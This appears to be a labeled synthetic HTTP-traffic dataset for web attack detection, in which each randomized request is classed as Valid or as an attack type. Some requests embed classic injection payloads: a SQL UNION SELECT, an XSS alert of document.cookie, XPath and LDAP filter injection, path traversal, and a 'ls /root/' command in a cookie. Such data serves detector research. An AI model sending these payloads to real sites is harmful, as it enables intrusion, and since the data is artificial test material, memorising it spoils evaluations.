Cookie: mzlbg2tchmi=../../../usr/dsqqdsqsd.xml;MZZunionF=433232;9oss=nqvbscripti;otz=ntqa;set=aphsaiSiH
Date: Fri, 31 Aug 07 24:24:47 UTC
ETag: W/"K2qzZJFVMpIwVVGeO"
If-Unmodified-Since: Thu, 20 Oct 05 21:06:46 CET
If-Match: "Fsp3BiKdgCM_3iel85e@"
If-Range: Mon, 05 Jun 06 01:00:16 CET
MIME-Version: 0.5
Pragma: celb='eorhmzr'
Referer: http://www.wbTvlej.cz/iR8seno.html
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 9.4; si-Nr; rv:8.2.6) Gecko/40651769
UA-CPU: StrongARM
UA-OS: Solaris
Via: 2.0 www.3tmmio.png:041
Upgrade: kulh8/4.6, evxuio/3.5
~~~~~: ~~~~~~~~~~~~~

e9mvroTadhih=olykgnkpp3 \&ouYjroa=91492&Ailrenzgm4pZe=\httpstdinp&ltWho7xrj3rcoaf=vel&aorlifrc=2&aHce=dmWHSqw8O&3mfiig1qea=nvYD2IFjDAGv&zrdeoeca0vceNg=anddeg2lsincludeptt?Eiqst<d&dfsi=1679&7r3csaisc=417

End - Id: 45040
Start - Id: 43643
class: OsCommanding
POST /a.f@reogKjd9MB/giEtai6oovsncnl/sAdUQd-stLWdc156JM/dteeeeeqexse2ae/lnlIenu28Ee46ybw/u9UVh5bQOk.cgi? HTTP/1.1
Content-Length: 76
Content-Language: adcid7ot,b
Content-Encoding: gzip
Content-Location: /gti9.tar
Content-MD5: dG85UmV0aDZTc3BuYmRlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Mar 08 02:17:52 CET
Last-Modified: Tue, 13 Nov 07 16:35:32 UTC
Host: 230.27.187.126
Connection: close
Accept: audio/basic;q=0.0
Accept-Charset: iso-8859-9;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=86746
Client-ip: 219.190.252.56
Cookie: Od4RIklf=ehowget;hnet=\nls /root/;8mfV4kzevalgR=h]oalscript teyvbscript[tfdprmtz;hbl0t=hg=aem3-aamsh;hjdpsos3to=eoQhcrrtos8cyo1not
Cookie2: $Version="401"
Date: Fri, 01 Oct 04 20:51:11 GMT
ETag: "DFz6-wVe0KJh44gKH5u"
Expect: 100-continue
From: stteA4ju@2lnVxdh.ch
If-Modified-Since: Fri, 06 Nov 09 17:57:46 UTC
If-Unmodified-Since: Tue, 10 May 05 18:02:12 UTC
If-Match: "1XZ1OOC7wNACCvJT"
If-None-Match: "SkHKbQKxH9_75crNam"
If-Range: Mon, 22 Mar 04 18:12:38 UTC
Max-Forwards: 3559
Pragma: c8ei4ace='7mte'
Range: 3033-,1431-72,33-
Referer: http://o1iau.it/zeoh/5saUovrd/o762/UajhMi/socnnTr.mpeg
TE: deflate
User-Agent: Mozilla/3.7 (Windows; U; WinNT 9.7; in-ni; rv:9.7.3) Gecko/44619257
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color16
Via: HTTP/4.1 33.33.241.115, 4reics/4.7 169.128.135.241
Transfer-Encoding: lnstnn; nMnnildY=nt3Ef
Upgrade: ruakde/7.8
X-Forwarded-For: 164.96.232.179
----: ----------------------

eeau4k7=e&e3uE8rb=ss&nadcrsLk=nY6O5Y@5&wcrsMhi0aIje=4e&pslOnrho=5884750737

End - Id: 43643
Start - Id: 12520
class: Valid
GET /hnaYkNlintEjewecg/aERcq@h7cMrmQ/sioPim4ewl/0mPLX/iekgtRm6CtSpKch.tiff?nek2hevWus=os-JpC&1hohnehxfaivos=5r&BF7V1=bFNUE72e HTTP/1.1
Host: www.spehrHaw.de
Connection: keep-alive
Accept: audio/x-wav, video/*;q=0.7
Accept-Charset: iso-8859-8
Accept-Encoding: *
Accept-Language: cje-pteiEe;q=0.9, tAH-30nS7, h8grR1-lTh;q=0.0, 12voktmq-ltwfnws0;q=0.3, u6t5-ePsuv;q=0.1
Cache-Control: no-store
Client-ip: 231.2.43.204
Cookie: svoiOrins8nhqus=o6;qxrt6pd=0;lvK.E=78;n8t0qNal=t5fintrstyleniels;s0ewfnSimDeEa2=286
Cookie2: $Version="820"
Date: Fri, 15 Feb 08 24:44:26 CET
ETag: W/"GB0yHjmBx9u.vEVCifDl"
Expect: 100-continue
From: deAe@iiia.st
If-Modified-Since: Sat, 27 Dec 08 09:25:34 GMT
If-Unmodified-Since: Thu, 04 Dec 08 17:31:17 GMT
If-Match: "SqPwJyTZUVSMBoI"
If-None-Match: "wm_gB8p9P.rkvDwpe-"
If-Range: "bAu8Tlj9AZ5VbRY6iULe"
Max-Forwards: 05
MIME-Version: 4.4
Pragma: eyhth=t
Proxy-Authorization: Digest qop=tlainatN
Authorization: Digest nonce
Range: 1-
Referer: http://www.dhfsNi.org/afsd0l/ieT3/so1k/etohfase/uirtren.php3
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/9.6 (X11; U; Unix 3.9; nl-CS; rv:1.6.6) Gecko/21513198
UA-CPU: Sparc
UA-Disp: 3658,3398,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 580x349
Via: 4.5 116.30.126.58
Transfer-Encoding: gzip
Upgrade: AGSes/3.1
Warning: 308 212.140.37.183 "tnstnwlHnrwl" 
X-Forwarded-For: 44.18.78.71
X-Serial-Number: 2197491883894
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12520
Start - Id: 12412
class: Valid
GET /gl/gtatre8rnhtearttmupE/q2qqRD2a/siieerMyyure/9.wnPtNpM0VEzLK6H/tqsiiha/araiffepnrahyalhtt/2pr.3LZJwD1W0/ouepldtsikhta7/f62VE7l0childh4_/h2EGKm.msf?N8enneIdtpiw=o+G6xeea0arrey&jn7slLy=wrne%7EsedtdIz&sayavcol0taa=e_c&sQAxCqYiHnetcat=171691311&aeeo=ehmnetcatr1af++s&FqJx-WFn=16224 HTTP/1.0
Host: 104.150.191.69
Connection: hqhArot
Accept: text/*, video/mpeg
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: rstna-cv2Srdns;q=0.1, oo-sS;q=0.9
Cache-Control: aloaoih=ebiA8u9
Client-ip: 133.200.48.246
Cookie: JcCF1=9;lrA2treeyrngto=s;zmedaimh8J=53574668;md=078;eJew=278
Cookie2: $Version="23"
Date: Thu, 03 May 07 21:48:39 GMT
ETag: W/"bwj.1qI6pKy-i7GX"
Expect: 100-continue
From: yiBv9i@mndhmfHee.st
If-Modified-Since: Wed, 08 Aug 07 02:57:25 CET
If-Unmodified-Since: Mon, 22 Aug 05 10:07:29 GMT
If-Match: *
If-None-Match: "P@OZ5pCL2w_7yl-j"
If-Range: Mon, 10 Oct 05 12:23:45 UTC
Max-Forwards: 9165
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: feoulm Ptecse1=aOIsge
Authorization: NTLM ZHBscnRlZW9uZ3RLclNoaXNFMGxhZGVvanRodWVzZlRua3JlYw==
Range: 345-,-6,98-2183
Referer: /7rthubn/aBhn/lLtc/EaTl.js
TE: trailers,chunked;q=0.6,deflate
Trailer: Host
User-Agent: Mozilla/6.9 (X11; U; SunOS sun4u 8.7; gu-mw; rv:2.7.6) Gecko/66221298
UA-CPU: PowerPC
UA-Disp: 8747,794,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7091x4892
Via: hbdss/6.2 113.9.156.247:77425
Transfer-Encoding: deflate
Upgrade: neuch/5.4
Warning: 287 176.2.7.94 "enesescISnojte" 
X-Forwarded-For: 197.61.217.27
X-Serial-Number: 200058201
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12412
Start - Id: 30905
class: Valid
GET /ltseer/ooenwlSii/slO4RQMVlfFNZ/moetiltt0k4j8rs/s-Rp-uS/ctTapi/TxaVicpb8tTIahlIc/DSmP/ehsneVezYne/yHZ/s6hoe/jkFO-TgRWLG_vL57GhI.nsf? HTTP/1.0
Host: www.Ntoiwnno.it
Connection: close
Accept: audio/x-wav;q=0.2, video/quicktime
Accept-Charset: x-mac-korean;q=0.8, iso-8859-9;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale=4149
Client-ip: 86.132.239.82
Cookie: eEmsrL49t=tDkVrEj;EieYaihra=4;sdxaI=afRjKlY;hwidrWssulastt=ktelnet;iEymhdrtpRiK=>zeyooneF gt)1;oseperecn6=lv
Cookie2: $Version="993"
Date: Sat, 04 Sep 04 23:23:37 UTC
ETag: "wqF6kYdqli4vwcyZD"
Expect: ycestrfr
From: O35r@NAzet.cz
If-Modified-Since: Mon, 24 Aug 09 07:11:12 UTC
If-Unmodified-Since: Mon, 19 Sep 05 04:47:29 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Oct 04 01:35:39 GMT
Max-Forwards: 4
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Basic c25lbDppZWRlbQ==
Authorization: Basic dG5pb2NobG46a0V0ZA==
Range: 7-19547,727449-
Referer: /net7jes/d3rTsalM/rdnue/rljnignh.shtml
TE: gzip;q=0.9,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/6.6 (X11; U; Linux i386 8.9; 4p-5c; rv:3.6.2) Gecko/75000537
UA-CPU: MIPS
UA-Disp: 495,4742,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1031x1153
Via: 9.6 74.57.59.122, 4.6 248.67.26.133
Transfer-Encoding: gzip
Upgrade: spiie/8.9, apg2sc/2.7, exuI/4.7, ndd/9.7, fnvse/6.9
Warning: 364 www.n0ehr.css:691 "oEieijPwonreuaI" "Thu, 15 May 08 10:24:17 UTC"
X-Forwarded-For: 61.167.250.228
X-Serial-Number: 7053586525400090779
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30905
Start - Id: 48567
class: XPathInjection
PUT /tz/enoTw/ex8aIzr.MZcMRqf.php4? HTTP/1.0
Content-Length: 179
Content-Language: sdT,bedbg5tt
Content-Encoding: deflate
Content-Location: http://iredw.de/5Cnov/eucoplr/Eaae/Eipse.mdb
Content-MD5: ZWlhaHRtaVhlbHN0YTVsZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Jan 09 14:19:42 GMT
Last-Modified: Sun, 22 May 05 04:47:32 GMT
Host: www.awdelcv.biz
Connection: close
Accept: application/rtf;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 5.57.77.191
Cookie: eeFea=rphpk;gtusaoWtEta=eWcmGXMwAG;Btensl='  >eQ[n4dO7hi t;A5whereUKininsertR=oTXTCQ8RPx;strdeo=w3zepwiimA
Cookie2: $Version="071"
Date: Mon, 23 May 05 17:14:15 GMT
ETag: "fm_n7HINRMZBgtTeDE"
Expect: Sqiorccr=plsduge
From: w3nw@eoeld2.be
If-Modified-Since: Tue, 04 Aug 09 05:48:08 GMT
If-Unmodified-Since: Sun, 20 Jun 04 22:14:19 CET
If-Match: "0p6whxnO@F7KRjR"
If-None-Match: *
If-Range: Thu, 13 Nov 08 13:14:49 GMT
Max-Forwards: 256
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM dDYwbmx1cHNyaXQ3YWlzdlFxcmFwVHRlbXIzTXhucm1yaGhmaW9FdXM=
Authorization: Basic bHJpbzp5ZW5vb2o=
Range: -99
Referer: http://elotn.cz/ablyr/io7ylds/o7qls.cgi
TE: deflate
Trailer: Date
User-Agent: Mozilla/7.4 (Windows; U; Win98 2.3; uh-A3; rv:9.6.4) Gecko/65241705
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0026x0337
Via: 6.6 www.AdPuexei.jpeg
Transfer-Encoding: nhRze
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 651 www.filmtc.css "8HFtmshdumhqpyai" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

iEaD5hefnpwi=135762800&3oBohN=sw7es&bibsporh=1577&ltl4T=256   or     a/egl7/osc2d/child::node()[position()=815]    or   3801=&lhkamIRt=ckeuH kr6&has=3641

End - Id: 48567
Start - Id: 23173
class: Valid
GET /iamr24et3Imiro/t7/4MIQP/eVc9N0/xiafDQngkv/eJF9wP0JDgZA/lnoHEmetaag4Y/scspUpt6FGg8/hseaq2tidfyNteh/onn/LEhomeGsTqCa/iulhdaeDDojhl.cgi?qD7sVS6.S=w%7Cnsi%3AoRy7&ir=lor&hsYlte=gissinflink&nAchlarn=9635 HTTP/1.0
Host: 187.47.97.226:80
Connection: close
Accept: */*
Accept-Charset: euc-cn, hz-gb-2312, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: nihneeg-hTvsjWhx, naiese-soaFl, mswt-n9ehontr
Cache-Control: min-fresh=96
Client-ip: 86.43.140.192
Cookie: arrtteida=93613957;8rmq1=38;iihoi=afpln;Dd2eu4connect=0te6rogSeaar%4;Ghheory@G91Y=9tl;srqn= rd2nosoi[wkecbgmocha
Cookie2: $Version="498"
Date: Fri, 27 Jun 08 15:55:34 CET
ETag: "zoMrvv7odJnK9Bq9s_"
Expect: 100-continue
From: ytscaT@osoeia.cz
If-Modified-Since: Thu, 10 Nov 05 22:09:41 CET
If-Unmodified-Since: Tue, 26 Dec 06 22:19:46 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 3.7
Pragma: ntngsewt=e1aagt
Proxy-Authorization: ariihf uAaec=elRxHnr
Authorization: d1Oeh ry3eoot=tthaEr
Range: -362684,26-
Referer: http://d6sot.it/aNsx7Tlt/hatw/fdno6/oiie3enA.jpeg
TE: chunked;q=0.8
Trailer: If-Unmodified-Since
User-Agent: tm6ant1g
UA-CPU: PowerPC
UA-Disp: 519,575,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 955x1403
Via: 2.2 126.36.22.103, FTP/0.1 135.225.56.122, 9.0 www.seirep.js
Transfer-Encoding: deflate
Upgrade: xeH/4.9
Warning: 412 www.Fsjawe.gif "ecfj" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 76690909
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 23173
Start - Id: 38221
class: LdapInjection
GET /iaTqyeheibt/sXaGxH_CTyDq3cGPP/n.1V84/se3fesnaoea4Im/yBo/csoIryrsLt0te.php3?4cyeeh=%29rse%25+emydganirn%5B4&ec6eRottw=hevTaKLfhrasseis&lnnnqa6osoh=73&ro7nphs5de=eselect%28O&gtoresa7c7s=oftp&r0liko4danaswn=Ots+egodnarafrg1&rropfo=1503&untTkes55eg=esnah%29%28+++%7C++%28e0e%3D*%29&Adorenaepra=nmailEillEt&Airwlifovr=01358998&RojTgerDnivkerr=n%40mimochadd%3B%5Drobjecto&F-P0wgetonxj6=tgWq&8lbTt4gilKer2y=sdNiH%2Fh%2F2ea+%3Bosn0a&cihsbktsieae=Ahttps&1oohrirhwiaft=0d0o HTTP/1.0
Host: www.wmin.fr
Connection: ndhi74fm
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 63.225.80.253
Cookie: 3laeeoeSqdu=ensstditarbtehr-o;ioooirpywfc6i6r=83749;shtmsc4hfeiikCe= haoes;sr=winntn;htaccesCQn1= 4;dAatHpimiund=550
Cookie2: $Version="7"
Date: Thu, 07 Sep 06 18:23:26 UTC
ETag: "HeHqGgYUuhkexda"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Tue, 30 Dec 08 23:59:02 GMT
If-Unmodified-Since: Fri, 10 Jul 09 01:52:13 UTC
If-Match: "y.wCVU.BuKP_shzB"
If-None-Match: "CY-_ds65mePOcEr"
If-Range: Fri, 20 Apr 07 13:33:25 UTC
Max-Forwards: 4667
MIME-Version: 3.2
Pragma: evt='g'
Proxy-Authorization: lN7eh8 3eeeTvs=rP8rhi
Authorization: Basic ZXQxbmM6QzBvZXNBZ0U=
Range: 491-,605-2708,157323-67914
Referer: /sfwteHy/oiRg/lTtnpnb/8Yenon6/uytjihpe.js
TE: chunked;q=0.3,trailers,deflate;q=0.8
Trailer: Date
User-Agent: Mozilla/7.3 (compatible; MSIE 4.2; Unix; thcueo)
UA-CPU: Sparc
UA-Disp: 791,509,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 321x2267
Via: HTTP/0.2 www.Srnuryo6.html, 7.3 www.rnHlhat.gif, HTTP/7.4 www.scrt.css
Transfer-Encoding: cam4se
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38221
Start - Id: 937
class: Valid
GET /ddtnsoxmsayoies/dmgwejl/RNNhtaccesvbscriptZZxJwinntIRp8@.htm?uow9=wooni&cs=ol6e&ht3lTr=4ntmpG&tdnon8tagS=jse HTTP/1.0
Host: 159.187.54.224
Connection: atTosr7
Accept: audio/*, image/jpeg, audio/x-wav;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: usi4geit-sa9xit, mo40ya-iu6jgeri, shgnelf-e0NS;q=0.7, neoe-tue5;q=0.1
Cache-Control: nzrhohf=thKgni
Client-ip: 137.42.138.53
Cookie: 1oinwVodn3e=tfo;uFincludeanetcat8O9=51;jQF7samp=w
Cookie2: $Version="0"
Date: Mon, 05 Nov 07 09:05:21 UTC
ETag: "jr06Kr9AbFL4OWD"
Expect: 100-continue
From: shr8m@eagitmhb.de
If-Modified-Since: Sat, 31 Jul 04 04:21:41 GMT
If-Unmodified-Since: Wed, 01 Feb 06 03:37:53 GMT
If-Match: "hSQi-OdIav8Nv5E"
If-None-Match: *
If-Range: *
Max-Forwards: 714
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=3BA1ee0d
Authorization: Basic YXR0cGQ6M2VpZmlsRQ==
Range: 37-165,99813-448132
Referer: http://www.zEcnN.fr/hsEnry/ibta/0i68a4b/el5i.gif
TE: trailers,trailers
Trailer: Expect
User-Agent: 3sfSO3xExC http://www.osee.com
UA-CPU: Sparc
UA-Disp: 705,7453,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 272x609
Via: FTP/3.3 252.233.63.73, 4.1 164.88.161.36, FTP/6.2 62.196.73.123
Transfer-Encoding: gzip
Upgrade: ero/9.1, efreh/0.0
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 09721285233182
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 937
Start - Id: 38746
class: LdapInjection
GET /9jJxIBbjSMD_/egehydeeen3Oe8to/hYQspy99NZRC/b@4n6Kl30wK/wmdtd/Nl3sIbetl/lE22pB/26skCbUUQ-9QfHx/xFjBinsertA-poxmlY.06/oVpsugaryonhz/s6ardoerppitlfi.bin?qvdBimgufrcphFvarG=log4b&uDfoe1d=aw&oFy0tiaIbgn3u=si8ljCexSoyB&setmvgdYItlag=51&KrIgFrnph-H=ml&0oej4e=Aclyreplace&metaRIhBpFnnH=sa0r%29%28++++%7C%28uh6p9%3D*%29 HTTP/1.0
Host: 240.122.199.198:452
Connection: usneBUm9
Accept: image/*, text/plain, application/x-tar;q=0.5
Accept-Charset: iso-8859-15
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: max-age=876
Client-ip: 111.176.120.104
Cookie: 2r5hTtnr=0905761;droptju=t7b_cO
Cookie2: $Version="60"
Date: Thu, 30 Nov 06 11:05:48 UTC
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 17 Apr 07 10:29:06 UTC
If-Unmodified-Since: Sat, 30 Sep 06 09:38:24 CET
If-Match: "83i0Z__GbkQNE@kFAV"
If-None-Match: *
If-Range: "F6F2@Ax-gf0gLSSeV"
Max-Forwards: 178
MIME-Version: 5.3
Pragma: t='b'
Proxy-Authorization: Basic eVRzbllhY2U6aXN0bw==
Authorization: Basic YW9scXcwbDpzZ2pq
Range: 6-630560,55-36780
Referer: /ht0n/r0rCmr/tnjlnta/a8lnfaol.gz
TE: chunked,deflate,gzip
Trailer: Upgrade
User-Agent: dhrcanamo
UA-CPU: MIPS
UA-Disp: 495,5054,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 479x813
Via: 4.8 www.sgrC3e.jpeg:4, FTP/4.2 28.222.212.146, FTP/4.4 89.157.173.61
Transfer-Encoding: gzip
Upgrade: dEii/5.0, tdxit/7.6, ieed/6.6, lZat/6.5, ogl/2.1
Warning: 623 118.59.242.63:0920 "rowFrsl" 
X-Forwarded-For: 205.210.81.15
X-Serial-Number: 91445747246733
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38746
Start - Id: 29954
class: Valid
GET /lAoqrqsleeio/ivIvFyWT-2HfQrZR2/dz1yjGPv6Dg/rwy.HWbIPSgjyBNdt/tde3icA1pmsdcad.jpeg? HTTP/1.1
Host: 152.11.107.82
Connection: close
Accept: audio/basic;q=0.6, text/xml
Accept-Charset: *
Accept-Encoding: compress;q=0.6, compress;q=0.6, gzip
Accept-Language: *
Cache-Control: max-stale
Client-ip: 86.24.254.167
Cookie: naon=a1lib])9ornehc[so;tsrhnupt=nullwnull r|dadminndm-aiMtp
Cookie2: $Version="85"
Date: Thu, 22 Feb 07 10:00:34 UTC
ETag: W/"_E9T1YxaIQ6t@7ajjrf8"
Expect: sp9u9b
From: otohir@ybNenoy.com
If-Modified-Since: Sat, 27 Dec 08 06:30:29 GMT
If-Unmodified-Since: Wed, 10 Mar 04 20:22:37 GMT
If-Match: "VtnbkjG5JcUopmiZCWXZ"
If-None-Match: *
If-Range: Mon, 10 Jan 05 17:06:48 UTC
Max-Forwards: 7
MIME-Version: 0.1
Pragma: w4eui='oitei'
Proxy-Authorization: elkidR hSthamtt=nsruueF
Authorization: Digest username="roe8tt"
Range: 054604-5
Referer: http://rsdPFqe.cz/cnnu7be/q3ia/hnex.mp3
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/5.2 (Machintosh; U; PPC 1.4; tl-si; rv:1.1.6) Gecko/64383533
UA-CPU: StrongARM
UA-Disp: 644,8528,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8863x9472
Via: HTTP/0.3 201.41.166.8, FTP/2.6 202.238.80.131, HTTP/5.2 www.gzxEe.js:9
Transfer-Encoding: compress
Upgrade: tdmen/0.4, l3p/6.1, eTan/3.8, nn6/5.8, ahtrk/8.0
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 223.222.247.27
X-Serial-Number: 7694011272
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 29954
Start - Id: 42110
class: SqlInjection
GET /VSinsert90M@PD.r_4/8wS1jIBlupdatesYEJB/e6TmPq-V4VgeM_po380t/t7XhmW/csstseRurtItToai/nde8baen1rheahm/hwd8effp3xc6shp-/wHGzJSG0Cq_0v7ofH/Creplace8/6rlgmepasioggfzseee/eSEfRtSgouEix4W4s1b.php?spositionQ1=ehxatg2r&gemzld=yDboot.iniirnoi0replaceirw4&T@O-CSPztmpi6=7l6.&Iraweeznreec=rUyNV85jvU&dteNrydnvedgz1=rm%24tesgcjyn&emcsptoZ=%3Ad&GwajpSl7eepsha=taobjectee&woNuYG4=o&1toc=snAgtijL&uzZa4F4execjOy=%27+%29++UNION++++ALL+++SELECT++++4+++++FROM++++ofnkiihzO++++WHERE++++%28%27%27%3D+%27&o4Irenimp=16270&xo8jf=5187890&aFstylexml=693566&7_BBmuorvP3Z=768707823 HTTP/1.0
Host: www.riisn.fr
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-3, euc-jp;q=0.4, iso-8859-15, koi8-r, iso-8859-1
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 139.71.160.209
Cookie: nrwnnlwow=neav3youlvayoo3Q
Cookie2: $Version="882"
Date: Tue, 25 Oct 05 18:11:16 GMT
ETag: "36ABV77V@jd_sdUj"
Expect: oeeEja9t=tncldfia;etnq3hno=qcai6udr
From: ri9it34@rxsle.fr
If-Modified-Since: Mon, 26 Jan 09 03:44:49 GMT
If-Unmodified-Since: Wed, 15 Aug 07 18:01:24 UTC
If-Match: "-fbhX_zHP2sTyqN"
If-None-Match: *
If-Range: Wed, 03 Oct 07 13:22:10 CET
Max-Forwards: 457
MIME-Version: 0.9
Pragma: NslsrH='er'
Proxy-Authorization: Digest uri=/wSot5/LjitAzt.php3
Authorization: NTLM cmVvQmlubGRvaXdkbnRjc3N5anN4cmFzbTZuZWJla2RzdW9hdQ==
Range: 80-3804,023297-91,09-
Referer: /eoLnrr/AaI1/wbeAnfs.asmx
TE: trailers,chunked
Trailer: Proxy-Authorization
User-Agent: dKpD8r6v7 http://www.nhat.uk
UA-CPU: Sparc
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 830x020
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: deflate
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42110
Start - Id: 46986
class: XSS
GET /Iwecsock_stream/Idugmja9/e4rrVk/uqyUeehITyw1roZ6V/gZWKM_3NkMWzCp/oreiab8Km4tnitrt7mh/iLUOK19DlxX4VVq.xt/totusbeetm/Y1p5wD2A.gif?VCtoie=te%3Acresenti5&nleoi=t6as&hgStsbv=ehbi%22%3E%3Cbody%2520onload%3Dalert+%28document.cookie%29%3B%3E&per6e=03128192&osr=oaPevYqqkrm&cossT=tusr4raTrH+i84&nlHZvm=i%3Adelete&ks6eieledo9=eLdl5fcae&uynEMtasd=9778337 HTTP/1.0
Host: 91.149.103.68
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 173.101.193.171
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Fri, 27 Oct 06 17:48:55 GMT
ETag: W/"Buq@whtrMtHZH-Bk7Zb"
Expect: 100-continue
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Mon, 25 Sep 06 19:21:45 CET
If-Unmodified-Since: Mon, 12 May 08 04:52:15 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Jun 09 08:56:48 GMT
Max-Forwards: 7
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZXNndGk4OmFvdGEwbw==
Range: 5-22964
Referer: http://www.aa5td6yh.com/Hkddxs8/egodteo.mpeg
TE: gzip,trailers,gzip
Trailer: Range
User-Agent: Mozilla/6.1 (Windows; U; Windows NT 9.8; ly-ot; rv:2.9.6) Gecko/95756323
UA-Disp: 2976,173,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 199x2885
Via: HTTP/3.6 www.hYbvu.tiff, sel/7.6 159.246.100.101
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46986
Start - Id: 22431
class: Valid
GET /IKu0R.dll? HTTP/1.0
Host: 77.112.17.146
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=06798
Client-ip: 198.11.91.39
Cookie: Czy_U=m;eIad9nats0eas=cq-Vm6-uf1.K
Cookie2: $Version="342"
Date: Fri, 17 Aug 07 09:01:07 UTC
ETag: "BoF.f1-nMyQCXEAXy"
Expect: 100-continue
From: ihv7ae@aqtd1l3.cz
If-Modified-Since: Mon, 08 Sep 08 08:12:56 GMT
If-Unmodified-Since: Fri, 05 Oct 07 20:01:04 CET
If-Match: "s@6rix1RVJdW3mH"
If-None-Match: "W6-9F2wGzaSPkRR"
If-Range: Fri, 17 Feb 06 18:11:11 UTC
Max-Forwards: 348
MIME-Version: 0.7
Pragma: an=algD
Proxy-Authorization: Digest response="E92992fa2fC6dA4Ba96fFa2ECf05CF00"
Authorization: ma3t toeNdfmz=thfe5
Range: 15-,-514
Referer: /hctt/lnoroa8s/odia1ndM/wgqyohd.tiff
TE: chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 6.3; 9s-04; rv:9.3.5) Gecko/39410026
UA-CPU: 68000
UA-Disp: 2687,163,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 112x1566
Via: HTTP/1.2 www.ahft.jpeg, 9.6 59.174.153.176
Transfer-Encoding: compress
Upgrade: said8/3.4, gNxedg/9.4
